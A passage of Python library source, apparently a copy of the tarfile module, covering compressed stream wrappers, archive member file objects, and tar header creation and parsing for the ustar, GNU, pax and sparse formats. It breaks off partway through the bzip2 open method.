self.fileobj.write(struct.pack("<L", self.crc & 0xffffffff)) self.fileobj.write(struct.pack("<L", self.pos & 0xffffFFFF)) if not self._extfileobj: self.fileobj.close() self.closed = True def _init_read_gz(self): """Initialize for reading a gzip compressed fileobj. """ self.cmp = self.zlib.decompressobj(-self.zlib.MAX_WBITS) self.dbuf = b"" # taken from gzip.GzipFile with some alterations if self.__read(2) != b"\037\213": raise ReadError("not a gzip file") if self.__read(1) != b"\010": raise CompressionError("unsupported compression method") flag = ord(self.__read(1)) self.__read(6) if flag & 4: xlen = ord(self.__read(1)) + 256 * ord(self.__read(1)) self.read(xlen) if flag & 8: while True: s = self.__read(1) if not s or s == NUL: break if flag & 16: while True: s = self.__read(1) if not s or s == NUL: break if flag & 2: self.__read(2) def tell(self): """Return the stream's file pointer position. """ return self.pos def seek(self, pos=0): """Set the stream's file pointer to pos. Negative seeking is forbidden. """ if pos - self.pos >= 0: blocks, remainder = divmod(pos - self.pos, self.bufsize) for i in range(blocks): self.read(self.bufsize) self.read(remainder) else: raise StreamError("seeking backwards is not allowed") return self.pos def read(self, size=None): """Return the next size number of bytes from the stream. If size is not defined, return all bytes of the stream up to EOF. """ if size is None: t = [] while True: buf = self._read(self.bufsize) if not buf: break t.append(buf) buf = "".join(t) else: buf = self._read(size) self.pos += len(buf) return buf def _read(self, size): """Return size bytes from the stream. """ if self.comptype == "tar": return self.__read(size) c = len(self.dbuf) while c < size: buf = self.__read(self.bufsize) if not buf: break try: buf = self.cmp.decompress(buf) except IOError: raise ReadError("invalid compressed data") self.dbuf += buf c += len(buf) buf = self.dbuf[:size] self.dbuf = self.dbuf[size:] return buf def __read(self, size): """Return size bytes from stream. If internal buffer is empty, read another block from the stream. """ c = len(self.buf) while c < size: buf = self.fileobj.read(self.bufsize) if not buf: break self.buf += buf c += len(buf) buf = self.buf[:size] self.buf = self.buf[size:] return buf # class _Stream class _StreamProxy(object): """Small proxy class that enables transparent compression detection for the Stream interface (mode 'r|*'). """ def __init__(self, fileobj): self.fileobj = fileobj self.buf = self.fileobj.read(BLOCKSIZE) def read(self, size): self.read = self.fileobj.read return self.buf def getcomptype(self): if self.buf.startswith(b"\037\213\010"): return "gz" if self.buf.startswith(b"BZh91"): return "bz2" return "tar" def close(self): self.fileobj.close() # class StreamProxy class _BZ2Proxy(object): """Small proxy class that enables external file object support for "r:bz2" and "w:bz2" modes. This is actually a workaround for a limitation in bz2 module's BZ2File class which (unlike gzip.GzipFile) has no support for a file object argument. 
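       Seeking backwards is implemented by re-initializing the decompressor
       and reading forward again from the start of the underlying file, so
       it is cheap to implement but potentially expensive to use.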
""" blocksize = 16 * 1024 def __init__(self, fileobj, mode): self.fileobj = fileobj self.mode = mode self.name = getattr(self.fileobj, "name", None) self.init() def init(self): import bz2 self.pos = 0 if self.mode == "r": self.bz2obj = bz2.BZ2Decompressor() self.fileobj.seek(0) self.buf = b"" else: self.bz2obj = bz2.BZ2Compressor() def read(self, size): x = len(self.buf) while x < size: raw = self.fileobj.read(self.blocksize) if not raw: break data = self.bz2obj.decompress(raw) self.buf += data x += len(data) buf = self.buf[:size] self.buf = self.buf[size:] self.pos += len(buf) return buf def seek(self, pos): if pos < self.pos: self.init() self.read(pos - self.pos) def tell(self): return self.pos def write(self, data): self.pos += len(data) raw = self.bz2obj.compress(data) self.fileobj.write(raw) def close(self): if self.mode == "w": raw = self.bz2obj.flush() self.fileobj.write(raw) # class _BZ2Proxy #------------------------ # Extraction file object #------------------------ class _FileInFile(object): """A thin wrapper around an existing file object that provides a part of its data as an individual file object. """ def __init__(self, fileobj, offset, size, blockinfo=None): self.fileobj = fileobj self.offset = offset self.size = size self.position = 0 if blockinfo is None: blockinfo = [(0, size)] # Construct a map with data and zero blocks. self.map_index = 0 self.map = [] lastpos = 0 realpos = self.offset for offset, size in blockinfo: if offset > lastpos: self.map.append((False, lastpos, offset, None)) self.map.append((True, offset, offset + size, realpos)) realpos += size lastpos = offset + size if lastpos < self.size: self.map.append((False, lastpos, self.size, None)) def seekable(self): if not hasattr(self.fileobj, "seekable"): # XXX gzip.GzipFile and bz2.BZ2File return True return self.fileobj.seekable() def tell(self): """Return the current file position. """ return self.position def seek(self, position): """Seek to a position in the file. """ self.position = position def read(self, size=None): """Read data from the file. """ if size is None: size = self.size - self.position else: size = min(size, self.size - self.position) buf = b"" while size > 0: while True: data, start, stop, offset = self.map[self.map_index] if start <= self.position < stop: break else: self.map_index += 1 if self.map_index == len(self.map): self.map_index = 0 length = min(size, stop - self.position) if data: self.fileobj.seek(offset + (self.position - start)) buf += self.fileobj.read(length) else: buf += NUL * length size -= length self.position += length return buf #class _FileInFile class ExFileObject(object): """File-like object for reading an archive member. Is returned by TarFile.extractfile(). """ blocksize = 1024 def __init__(self, tarfile, tarinfo): self.fileobj = _FileInFile(tarfile.fileobj, tarinfo.offset_data, tarinfo.size, tarinfo.sparse) self.name = tarinfo.name self.mode = "r" self.closed = False self.size = tarinfo.size self.position = 0 self.buffer = b"" def readable(self): return True def writable(self): return False def seekable(self): return self.fileobj.seekable() def read(self, size=None): """Read at most size bytes from the file. If size is not present or None, read all data until EOF is reached. 
""" if self.closed: raise ValueError("I/O operation on closed file") buf = b"" if self.buffer: if size is None: buf = self.buffer self.buffer = b"" else: buf = self.buffer[:size] self.buffer = self.buffer[size:] if size is None: buf += self.fileobj.read() else: buf += self.fileobj.read(size - len(buf)) self.position += len(buf) return buf # XXX TextIOWrapper uses the read1() method. read1 = read def readline(self, size=-1): """Read one entire line from the file. If size is present and non-negative, return a string with at most that size, which may be an incomplete line. """ if self.closed: raise ValueError("I/O operation on closed file") pos = self.buffer.find(b"\n") + 1 if pos == 0: # no newline found. while True: buf = self.fileobj.read(self.blocksize) self.buffer += buf if not buf or b"\n" in buf: pos = self.buffer.find(b"\n") + 1 if pos == 0: # no newline found. pos = len(self.buffer) break if size != -1: pos = min(size, pos) buf = self.buffer[:pos] self.buffer = self.buffer[pos:] self.position += len(buf) return buf def readlines(self): """Return a list with all remaining lines. """ result = [] while True: line = self.readline() if not line: break result.append(line) return result def tell(self): """Return the current file position. """ if self.closed: raise ValueError("I/O operation on closed file") return self.position def seek(self, pos, whence=os.SEEK_SET): """Seek to a position in the file. """ if self.closed: raise ValueError("I/O operation on closed file") if whence == os.SEEK_SET: self.position = min(max(pos, 0), self.size) elif whence == os.SEEK_CUR: if pos < 0: self.position = max(self.position + pos, 0) else: self.position = min(self.position + pos, self.size) elif whence == os.SEEK_END: self.position = max(min(self.size + pos, self.size), 0) else: raise ValueError("Invalid argument") self.buffer = b"" self.fileobj.seek(self.position) def close(self): """Close the file object. """ self.closed = True def __iter__(self): """Get an iterator over the file's lines. """ while True: line = self.readline() if not line: break yield line #class ExFileObject #------------------ # Exported Classes #------------------ class TarInfo(object): """Informational class which holds the details about an archive member given by a tar header block. TarInfo objects are returned by TarFile.getmember(), TarFile.getmembers() and TarFile.gettarinfo() and are usually created internally. """ __slots__ = ("name", "mode", "uid", "gid", "size", "mtime", "chksum", "type", "linkname", "uname", "gname", "devmajor", "devminor", "offset", "offset_data", "pax_headers", "sparse", "tarfile", "_sparse_structs", "_link_target") def __init__(self, name=""): """Construct a TarInfo object. name is the optional name of the member. """ self.name = name # member name self.mode = 0o644 # file permissions self.uid = 0 # user id self.gid = 0 # group id self.size = 0 # file size self.mtime = 0 # modification time self.chksum = 0 # header checksum self.type = REGTYPE # member type self.linkname = "" # link name self.uname = "" # user name self.gname = "" # group name self.devmajor = 0 # device major number self.devminor = 0 # device minor number self.offset = 0 # the tar header starts here self.offset_data = 0 # the file's data starts here self.sparse = None # sparse member information self.pax_headers = {} # pax header information # In pax headers the "name" and "linkname" field are called # "path" and "linkpath". 
def _getpath(self): return self.name def _setpath(self, name): self.name = name path = property(_getpath, _setpath) def _getlinkpath(self): return self.linkname def _setlinkpath(self, linkname): self.linkname = linkname linkpath = property(_getlinkpath, _setlinkpath) def __repr__(self): return "<%s %r at %#x>" % (self.__class__.__name__,self.name,id(self)) def get_info(self): """Return the TarInfo's attributes as a dictionary. """ info = { "name": self.name, "mode": self.mode & 0o7777, "uid": self.uid, "gid": self.gid, "size": self.size, "mtime": self.mtime, "chksum": self.chksum, "type": self.type, "linkname": self.linkname, "uname": self.uname, "gname": self.gname, "devmajor": self.devmajor, "devminor": self.devminor } if info["type"] == DIRTYPE and not info["name"].endswith("/"): info["name"] += "/" return info def tobuf(self, format=DEFAULT_FORMAT, encoding=ENCODING, errors="surrogateescape"): """Return a tar header as a string of 512 byte blocks. """ info = self.get_info() if format == USTAR_FORMAT: return self.create_ustar_header(info, encoding, errors) elif format == GNU_FORMAT: return self.create_gnu_header(info, encoding, errors) elif format == PAX_FORMAT: return self.create_pax_header(info, encoding) else: raise ValueError("invalid format") def create_ustar_header(self, info, encoding, errors): """Return the object as a ustar header block. """ info["magic"] = POSIX_MAGIC if len(info["linkname"]) > LENGTH_LINK: raise ValueError("linkname is too long") if len(info["name"]) > LENGTH_NAME: info["prefix"], info["name"] = self._posix_split_name(info["name"]) return self._create_header(info, USTAR_FORMAT, encoding, errors) def create_gnu_header(self, info, encoding, errors): """Return the object as a GNU header block sequence. """ info["magic"] = GNU_MAGIC buf = b"" if len(info["linkname"]) > LENGTH_LINK: buf += self._create_gnu_long_header(info["linkname"], GNUTYPE_LONGLINK, encoding, errors) if len(info["name"]) > LENGTH_NAME: buf += self._create_gnu_long_header(info["name"], GNUTYPE_LONGNAME, encoding, errors) return buf + self._create_header(info, GNU_FORMAT, encoding, errors) def create_pax_header(self, info, encoding): """Return the object as a ustar header block. If it cannot be represented this way, prepend a pax extended header sequence with supplement information. """ info["magic"] = POSIX_MAGIC pax_headers = self.pax_headers.copy() # Test string fields for values that exceed the field length or cannot # be represented in ASCII encoding. for name, hname, length in ( ("name", "path", LENGTH_NAME), ("linkname", "linkpath", LENGTH_LINK), ("uname", "uname", 32), ("gname", "gname", 32)): if hname in pax_headers: # The pax header has priority. continue # Try to encode the string as ASCII. try: info[name].encode("ascii", "strict") except UnicodeEncodeError: pax_headers[hname] = info[name] continue if len(info[name]) > length: pax_headers[hname] = info[name] # Test number fields for values that exceed the field limit or values # that like to be stored as float. for name, digits in (("uid", 8), ("gid", 8), ("size", 12), ("mtime", 12)): if name in pax_headers: # The pax header has priority. Avoid overflow. info[name] = 0 continue val = info[name] if not 0 <= val < 8 ** (digits - 1) or isinstance(val, float): pax_headers[name] = str(val) info[name] = 0 # Create a pax extended header if necessary. 
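        # Whatever could not be represented in the plain ustar header is
        # emitted first as an extended (type 'x') header; the ustar block
        # that follows carries best-effort ASCII values only.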
if pax_headers: buf = self._create_pax_generic_header(pax_headers, XHDTYPE, encoding) else: buf = b"" return buf + self._create_header(info, USTAR_FORMAT, "ascii", "replace") @classmethod def create_pax_global_header(cls, pax_headers): """Return the object as a pax global header block sequence. """ return cls._create_pax_generic_header(pax_headers, XGLTYPE, "utf8") def _posix_split_name(self, name): """Split a name longer than 100 chars into a prefix and a name part. """ prefix = name[:LENGTH_PREFIX + 1] while prefix and prefix[-1] != "/": prefix = prefix[:-1] name = name[len(prefix):] prefix = prefix[:-1] if not prefix or len(name) > LENGTH_NAME: raise ValueError("name is too long") return prefix, name @staticmethod def _create_header(info, format, encoding, errors): """Return a header block. info is a dictionary with file information, format must be one of the *_FORMAT constants. """ parts = [ stn(info.get("name", ""), 100, encoding, errors), itn(info.get("mode", 0) & 0o7777, 8, format), itn(info.get("uid", 0), 8, format), itn(info.get("gid", 0), 8, format), itn(info.get("size", 0), 12, format), itn(info.get("mtime", 0), 12, format), b" ", # checksum field info.get("type", REGTYPE), stn(info.get("linkname", ""), 100, encoding, errors), info.get("magic", POSIX_MAGIC), stn(info.get("uname", ""), 32, encoding, errors), stn(info.get("gname", ""), 32, encoding, errors), itn(info.get("devmajor", 0), 8, format), itn(info.get("devminor", 0), 8, format), stn(info.get("prefix", ""), 155, encoding, errors) ] buf = struct.pack("%ds" % BLOCKSIZE, b"".join(parts)) chksum = calc_chksums(buf[-BLOCKSIZE:])[0] buf = buf[:-364] + ("%06o\0" % chksum).encode("ascii") + buf[-357:] return buf @staticmethod def _create_payload(payload): """Return the string payload filled with zero bytes up to the next 512 byte border. """ blocks, remainder = divmod(len(payload), BLOCKSIZE) if remainder > 0: payload += (BLOCKSIZE - remainder) * NUL return payload @classmethod def _create_gnu_long_header(cls, name, type, encoding, errors): """Return a GNUTYPE_LONGNAME or GNUTYPE_LONGLINK sequence for name. """ name = name.encode(encoding, errors) + NUL info = {} info["name"] = "././@LongLink" info["type"] = type info["size"] = len(name) info["magic"] = GNU_MAGIC # create extended header + name blocks. return cls._create_header(info, USTAR_FORMAT, encoding, errors) + \ cls._create_payload(name) @classmethod def _create_pax_generic_header(cls, pax_headers, type, encoding): """Return a POSIX.1-2008 extended or global header sequence that contains a list of keyword, value pairs. The values must be strings. """ # Check if one of the fields contains surrogate characters and thereby # forces hdrcharset=BINARY, see _proc_pax() for more information. binary = False for keyword, value in pax_headers.items(): try: value.encode("utf8", "strict") except UnicodeEncodeError: binary = True break records = b"" if binary: # Put the hdrcharset field at the beginning of the header. records += b"21 hdrcharset=BINARY\n" for keyword, value in pax_headers.items(): keyword = keyword.encode("utf8") if binary: # Try to restore the original byte representation of `value'. # Needless to say, that the encoding must match the string. 
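                # The "surrogateescape" handler maps the lone surrogates that
                # were created while reading undecodable input back to the
                # original raw bytes.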
value = value.encode(encoding, "surrogateescape") else: value = value.encode("utf8") l = len(keyword) + len(value) + 3 # ' ' + '=' + '\n' n = p = 0 while True: n = l + len(str(p)) if n == p: break p = n records += bytes(str(p), "ascii") + b" " + keyword + b"=" + value + b"\n" # We use a hardcoded "././@PaxHeader" name like star does # instead of the one that POSIX recommends. info = {} info["name"] = "././@PaxHeader" info["type"] = type info["size"] = len(records) info["magic"] = POSIX_MAGIC # Create pax header + record blocks. return cls._create_header(info, USTAR_FORMAT, "ascii", "replace") + \ cls._create_payload(records) @classmethod def frombuf(cls, buf, encoding, errors): """Construct a TarInfo object from a 512 byte bytes object. """ if len(buf) == 0: raise EmptyHeaderError("empty header") if len(buf) != BLOCKSIZE: raise TruncatedHeaderError("truncated header") if buf.count(NUL) == BLOCKSIZE: raise EOFHeaderError("end of file header") chksum = nti(buf[148:156]) if chksum not in calc_chksums(buf): raise InvalidHeaderError("bad checksum") obj = cls() obj.name = nts(buf[0:100], encoding, errors) obj.mode = nti(buf[100:108]) obj.uid = nti(buf[108:116]) obj.gid = nti(buf[116:124]) obj.size = nti(buf[124:136]) obj.mtime = nti(buf[136:148]) obj.chksum = chksum obj.type = buf[156:157] obj.linkname = nts(buf[157:257], encoding, errors) obj.uname = nts(buf[265:297], encoding, errors) obj.gname = nts(buf[297:329], encoding, errors) obj.devmajor = nti(buf[329:337]) obj.devminor = nti(buf[337:345]) prefix = nts(buf[345:500], encoding, errors) # Old V7 tar format represents a directory as a regular # file with a trailing slash. if obj.type == AREGTYPE and obj.name.endswith("/"): obj.type = DIRTYPE # The old GNU sparse format occupies some of the unused # space in the buffer for up to 4 sparse structures. # Save the them for later processing in _proc_sparse(). if obj.type == GNUTYPE_SPARSE: pos = 386 structs = [] for i in range(4): try: offset = nti(buf[pos:pos + 12]) numbytes = nti(buf[pos + 12:pos + 24]) except ValueError: break structs.append((offset, numbytes)) pos += 24 isextended = bool(buf[482]) origsize = nti(buf[483:495]) obj._sparse_structs = (structs, isextended, origsize) # Remove redundant slashes from directories. if obj.isdir(): obj.name = obj.name.rstrip("/") # Reconstruct a ustar longname. if prefix and obj.type not in GNU_TYPES: obj.name = prefix + "/" + obj.name return obj @classmethod def fromtarfile(cls, tarfile): """Return the next TarInfo object from TarFile object tarfile. """ buf = tarfile.fileobj.read(BLOCKSIZE) obj = cls.frombuf(buf, tarfile.encoding, tarfile.errors) obj.offset = tarfile.fileobj.tell() - BLOCKSIZE return obj._proc_member(tarfile) #-------------------------------------------------------------------------- # The following are methods that are called depending on the type of a # member. The entry point is _proc_member() which can be overridden in a # subclass to add custom _proc_*() methods. A _proc_*() method MUST # implement the following # operations: # 1. Set self.offset_data to the position where the data blocks begin, # if there is data that follows. # 2. Set tarfile.offset to the position where the next member's header will # begin. # 3. Return self or another valid TarInfo object. def _proc_member(self, tarfile): """Choose the right processing method depending on the type and call it. 
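           GNU longname/longlink and pax headers are meta members: the
           information they carry is applied to the regular member that
           follows them, and that member is returned in their place.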
""" if self.type in (GNUTYPE_LONGNAME, GNUTYPE_LONGLINK): return self._proc_gnulong(tarfile) elif self.type == GNUTYPE_SPARSE: return self._proc_sparse(tarfile) elif self.type in (XHDTYPE, XGLTYPE, SOLARIS_XHDTYPE): return self._proc_pax(tarfile) else: return self._proc_builtin(tarfile) def _proc_builtin(self, tarfile): """Process a builtin type or an unknown type which will be treated as a regular file. """ self.offset_data = tarfile.fileobj.tell() offset = self.offset_data if self.isreg() or self.type not in SUPPORTED_TYPES: # Skip the following data blocks. offset += self._block(self.size) tarfile.offset = offset # Patch the TarInfo object with saved global # header information. self._apply_pax_info(tarfile.pax_headers, tarfile.encoding, tarfile.errors) return self def _proc_gnulong(self, tarfile): """Process the blocks that hold a GNU longname or longlink member. """ buf = tarfile.fileobj.read(self._block(self.size)) # Fetch the next header and process it. try: next = self.fromtarfile(tarfile) except HeaderError: raise SubsequentHeaderError("missing or bad subsequent header") # Patch the TarInfo object from the next header with # the longname information. next.offset = self.offset if self.type == GNUTYPE_LONGNAME: next.name = nts(buf, tarfile.encoding, tarfile.errors) elif self.type == GNUTYPE_LONGLINK: next.linkname = nts(buf, tarfile.encoding, tarfile.errors) return next def _proc_sparse(self, tarfile): """Process a GNU sparse header plus extra headers. """ # We already collected some sparse structures in frombuf(). structs, isextended, origsize = self._sparse_structs del self._sparse_structs # Collect sparse structures from extended header blocks. while isextended: buf = tarfile.fileobj.read(BLOCKSIZE) pos = 0 for i in range(21): try: offset = nti(buf[pos:pos + 12]) numbytes = nti(buf[pos + 12:pos + 24]) except ValueError: break if offset and numbytes: structs.append((offset, numbytes)) pos += 24 isextended = bool(buf[504]) self.sparse = structs self.offset_data = tarfile.fileobj.tell() tarfile.offset = self.offset_data + self._block(self.size) self.size = origsize return self def _proc_pax(self, tarfile): """Process an extended or global header as described in POSIX.1-2008. """ # Read the header information. buf = tarfile.fileobj.read(self._block(self.size)) # A pax header stores supplemental information for either # the following file (extended) or all following files # (global). if self.type == XGLTYPE: pax_headers = tarfile.pax_headers else: pax_headers = tarfile.pax_headers.copy() # Check if the pax header contains a hdrcharset field. This tells us # the encoding of the path, linkpath, uname and gname fields. Normally, # these fields are UTF-8 encoded but since POSIX.1-2008 tar # implementations are allowed to store them as raw binary strings if # the translation to UTF-8 fails. match = re.search(br"\d+ hdrcharset=([^\n]+)\n", buf) if match is not None: pax_headers["hdrcharset"] = match.group(1).decode("utf8") # For the time being, we don't care about anything other than "BINARY". # The only other value that is currently allowed by the standard is # "ISO-IR 10646 2000 UTF-8" in other words UTF-8. hdrcharset = pax_headers.get("hdrcharset") if hdrcharset == "BINARY": encoding = tarfile.encoding else: encoding = "utf8" # Parse pax header information. A record looks like that: # "%d %s=%s\n" % (length, keyword, value). length is the size # of the complete record including the length field itself and # the newline. keyword and value are both UTF-8 encoded strings. 
regex = re.compile(br"(\d+) ([^=]+)=") pos = 0 while True: match = regex.match(buf, pos) if not match: break length, keyword = match.groups() length = int(length) value = buf[match.end(2) + 1:match.start(1) + length - 1] # Normally, we could just use "utf8" as the encoding and "strict" # as the error handler, but we better not take the risk. For # example, GNU tar <= 1.23 is known to store filenames it cannot # translate to UTF-8 as raw strings (unfortunately without a # hdrcharset=BINARY header). # We first try the strict standard encoding, and if that fails we # fall back on the user's encoding and error handler. keyword = self._decode_pax_field(keyword, "utf8", "utf8", tarfile.errors) if keyword in PAX_NAME_FIELDS: value = self._decode_pax_field(value, encoding, tarfile.encoding, tarfile.errors) else: value = self._decode_pax_field(value, "utf8", "utf8", tarfile.errors) pax_headers[keyword] = value pos += length # Fetch the next header. try: next = self.fromtarfile(tarfile) except HeaderError: raise SubsequentHeaderError("missing or bad subsequent header") # Process GNU sparse information. if "GNU.sparse.map" in pax_headers: # GNU extended sparse format version 0.1. self._proc_gnusparse_01(next, pax_headers) elif "GNU.sparse.size" in pax_headers: # GNU extended sparse format version 0.0. self._proc_gnusparse_00(next, pax_headers, buf) elif pax_headers.get("GNU.sparse.major") == "1" and pax_headers.get("GNU.sparse.minor") == "0": # GNU extended sparse format version 1.0. self._proc_gnusparse_10(next, pax_headers, tarfile) if self.type in (XHDTYPE, SOLARIS_XHDTYPE): # Patch the TarInfo object with the extended header info. next._apply_pax_info(pax_headers, tarfile.encoding, tarfile.errors) next.offset = self.offset if "size" in pax_headers: # If the extended header replaces the size field, # we need to recalculate the offset where the next # header starts. offset = next.offset_data if next.isreg() or next.type not in SUPPORTED_TYPES: offset += next._block(next.size) tarfile.offset = offset return next def _proc_gnusparse_00(self, next, pax_headers, buf): """Process a GNU tar extended sparse header, version 0.0. """ offsets = [] for match in re.finditer(br"\d+ GNU.sparse.offset=(\d+)\n", buf): offsets.append(int(match.group(1))) numbytes = [] for match in re.finditer(br"\d+ GNU.sparse.numbytes=(\d+)\n", buf): numbytes.append(int(match.group(1))) next.sparse = list(zip(offsets, numbytes)) def _proc_gnusparse_01(self, next, pax_headers): """Process a GNU tar extended sparse header, version 0.1. """ sparse = [int(x) for x in pax_headers["GNU.sparse.map"].split(",")] next.sparse = list(zip(sparse[::2], sparse[1::2])) def _proc_gnusparse_10(self, next, pax_headers, tarfile): """Process a GNU tar extended sparse header, version 1.0. """ fields = None sparse = [] buf = tarfile.fileobj.read(BLOCKSIZE) fields, buf = buf.split(b"\n", 1) fields = int(fields) while len(sparse) < fields * 2: if b"\n" not in buf: buf += tarfile.fileobj.read(BLOCKSIZE) number, buf = buf.split(b"\n", 1) sparse.append(int(number)) next.offset_data = tarfile.fileobj.tell() next.sparse = list(zip(sparse[::2], sparse[1::2])) def _apply_pax_info(self, pax_headers, encoding, errors): """Replace fields with supplemental information from a previous pax extended or global header. 
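           Keywords that do not correspond to a known field are kept in
           pax_headers but leave the member's other attributes untouched.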
""" for keyword, value in pax_headers.items(): if keyword == "GNU.sparse.name": setattr(self, "path", value) elif keyword == "GNU.sparse.size": setattr(self, "size", int(value)) elif keyword == "GNU.sparse.realsize": setattr(self, "size", int(value)) elif keyword in PAX_FIELDS: if keyword in PAX_NUMBER_FIELDS: try: value = PAX_NUMBER_FIELDS[keyword](value) except ValueError: value = 0 if keyword == "path": value = value.rstrip("/") setattr(self, keyword, value) self.pax_headers = pax_headers.copy() def _decode_pax_field(self, value, encoding, fallback_encoding, fallback_errors): """Decode a single field from a pax record. """ try: return value.decode(encoding, "strict") except UnicodeDecodeError: return value.decode(fallback_encoding, fallback_errors) def _block(self, count): """Round up a byte count by BLOCKSIZE and return it, e.g. _block(834) => 1024. """ blocks, remainder = divmod(count, BLOCKSIZE) if remainder: blocks += 1 return blocks * BLOCKSIZE def isreg(self): return self.type in REGULAR_TYPES def isfile(self): return self.isreg() def isdir(self): return self.type == DIRTYPE def issym(self): return self.type == SYMTYPE def islnk(self): return self.type == LNKTYPE def ischr(self): return self.type == CHRTYPE def isblk(self): return self.type == BLKTYPE def isfifo(self): return self.type == FIFOTYPE def issparse(self): return self.sparse is not None def isdev(self): return self.type in (CHRTYPE, BLKTYPE, FIFOTYPE) # class TarInfo class TarFile(object): """The TarFile Class provides an interface to tar archives. """ debug = 0 # May be set from 0 (no msgs) to 3 (all msgs) dereference = False # If true, add content of linked file to the # tar file, else the link. ignore_zeros = False # If true, skips empty or invalid blocks and # continues processing. errorlevel = 1 # If 0, fatal errors only appear in debug # messages (if debug >= 0). If > 0, errors # are passed to the caller as exceptions. format = DEFAULT_FORMAT # The format to use when creating an archive. encoding = ENCODING # Encoding for 8-bit character strings. errors = None # Error handler for unicode conversion. tarinfo = TarInfo # The default TarInfo class to use. fileobject = ExFileObject # The default ExFileObject class to use. def __init__(self, name=None, mode="r", fileobj=None, format=None, tarinfo=None, dereference=None, ignore_zeros=None, encoding=None, errors="surrogateescape", pax_headers=None, debug=None, errorlevel=None): """Open an (uncompressed) tar archive `name'. `mode' is either 'r' to read from an existing archive, 'a' to append data to an existing file or 'w' to create a new file overwriting an existing one. `mode' defaults to 'r'. If `fileobj' is given, it is used for reading or writing data. If it can be determined, `mode' is overridden by `fileobj's mode. `fileobj' is not closed, when TarFile is closed. """ if len(mode) > 1 or mode not in "raw": raise ValueError("mode must be 'r', 'a' or 'w'") self.mode = mode self._mode = {"r": "rb", "a": "r+b", "w": "wb"}[mode] if not fileobj: if self.mode == "a" and not os.path.exists(name): # Create nonexistent files in append mode. self.mode = "w" self._mode = "wb" fileobj = bltn_open(name, self._mode) self._extfileobj = False else: if name is None and hasattr(fileobj, "name"): name = fileobj.name if hasattr(fileobj, "mode"): self._mode = fileobj.mode self._extfileobj = True self.name = os.path.abspath(name) if name else None self.fileobj = fileobj # Init attributes. 
if format is not None: self.format = format if tarinfo is not None: self.tarinfo = tarinfo if dereference is not None: self.dereference = dereference if ignore_zeros is not None: self.ignore_zeros = ignore_zeros if encoding is not None: self.encoding = encoding self.errors = errors if pax_headers is not None and self.format == PAX_FORMAT: self.pax_headers = pax_headers else: self.pax_headers = {} if debug is not None: self.debug = debug if errorlevel is not None: self.errorlevel = errorlevel # Init datastructures. self.closed = False self.members = [] # list of members as TarInfo objects self._loaded = False # flag if all members have been read self.offset = self.fileobj.tell() # current position in the archive file self.inodes = {} # dictionary caching the inodes of # archive members already added try: if self.mode == "r": self.firstmember = None self.firstmember = self.next() if self.mode == "a": # Move to the end of the archive, # before the first empty block. while True: self.fileobj.seek(self.offset) try: tarinfo = self.tarinfo.fromtarfile(self) self.members.append(tarinfo) except EOFHeaderError: self.fileobj.seek(self.offset) break except HeaderError as e: raise ReadError(str(e)) if self.mode in "aw": self._loaded = True if self.pax_headers: buf = self.tarinfo.create_pax_global_header(self.pax_headers.copy()) self.fileobj.write(buf) self.offset += len(buf) except: if not self._extfileobj: self.fileobj.close() self.closed = True raise #-------------------------------------------------------------------------- # Below are the classmethods which act as alternate constructors to the # TarFile class. The open() method is the only one that is needed for # public use; it is the "super"-constructor and is able to select an # adequate "sub"-constructor for a particular compression using the mapping # from OPEN_METH. # # This concept allows one to subclass TarFile without losing the comfort of # the super-constructor. A sub-constructor is registered and made available # by adding it to the mapping in OPEN_METH. @classmethod def open(cls, name=None, mode="r", fileobj=None, bufsize=RECORDSIZE, **kwargs): """Open a tar archive for reading, writing or appending. Return an appropriate TarFile class. mode: 'r' or 'r:*' open for reading with transparent compression 'r:' open for reading exclusively uncompressed 'r:gz' open for reading with gzip compression 'r:bz2' open for reading with bzip2 compression 'a' or 'a:' open for appending, creating the file if necessary 'w' or 'w:' open for writing without compression 'w:gz' open for writing with gzip compression 'w:bz2' open for writing with bzip2 compression 'r|*' open a stream of tar blocks with transparent compression 'r|' open an uncompressed stream of tar blocks for reading 'r|gz' open a gzip compressed stream of tar blocks 'r|bz2' open a bzip2 compressed stream of tar blocks 'w|' open an uncompressed stream for writing 'w|gz' open a gzip compressed stream for writing 'w|bz2' open a bzip2 compressed stream for writing """ if not name and not fileobj: raise ValueError("nothing to open") if mode in ("r", "r:*"): # Find out which *open() is appropriate for opening the file. 
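            # Each registered *open() helper is tried in turn; a helper that
            # cannot handle the data raises ReadError or CompressionError, an
            # external fileobj is rewound to its saved position, and the next
            # helper is tried.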
for comptype in cls.OPEN_METH: func = getattr(cls, cls.OPEN_METH[comptype]) if fileobj is not None: saved_pos = fileobj.tell() try: return func(name, "r", fileobj, **kwargs) except (ReadError, CompressionError) as e: if fileobj is not None: fileobj.seek(saved_pos) continue raise ReadError("file could not be opened successfully") elif ":" in mode: filemode, comptype = mode.split(":", 1) filemode = filemode or "r" comptype = comptype or "tar" # Select the *open() function according to # given compression. if comptype in cls.OPEN_METH: func = getattr(cls, cls.OPEN_METH[comptype]) else: raise CompressionError("unknown compression type %r" % comptype) return func(name, filemode, fileobj, **kwargs) elif "|" in mode: filemode, comptype = mode.split("|", 1) filemode = filemode or "r" comptype = comptype or "tar" if filemode not in "rw": raise ValueError("mode must be 'r' or 'w'") stream = _Stream(name, filemode, comptype, fileobj, bufsize) try: t = cls(name, filemode, stream, **kwargs) except: stream.close() raise t._extfileobj = False return t elif mode in "aw": return cls.taropen(name, mode, fileobj, **kwargs) raise ValueError("undiscernible mode") @classmethod def taropen(cls, name, mode="r", fileobj=None, **kwargs): """Open uncompressed tar archive name for reading or writing. """ if len(mode) > 1 or mode not in "raw": raise ValueError("mode must be 'r', 'a' or 'w'") return cls(name, mode, fileobj, **kwargs) @classmethod def gzopen(cls, name, mode="r", fileobj=None, compresslevel=9, **kwargs): """Open gzip compressed tar archive name for reading or writing. Appending is not allowed. """ if len(mode) > 1 or mode not in "rw": raise ValueError("mode must be 'r' or 'w'") try: import gzip gzip.GzipFile except (ImportError, AttributeError): raise CompressionError("gzip module is not available") extfileobj = fileobj is not None try: fileobj = gzip.GzipFile(name, mode + "b", compresslevel, fileobj) t = cls.taropen(name, mode, fileobj, **kwargs) except IOError: if not extfileobj and fileobj is not None: fileobj.close() if fileobj is None: raise raise ReadError("not a gzip file") except: if not extfileobj and fileobj is not None: fileobj.close() raise t._extfileobj = extfileobj return t @classmethod def bz2open(cls, name, mode="r", fileobj=None, compresslevel=9, **kwargs): """Open bzip2 compressed tar archive name for reading or writing. Appending is not allowed. """ if len(mode) > 1 or mode not in "rw": raise ValueError("mode must be 'r' or 'w'.") try: import bz2 except ImportError: raise CompressionError("bz2 module is not available") if fileobj is not None: fileobj = _BZ2Proxy(fileobj, mode) else: fileobj = 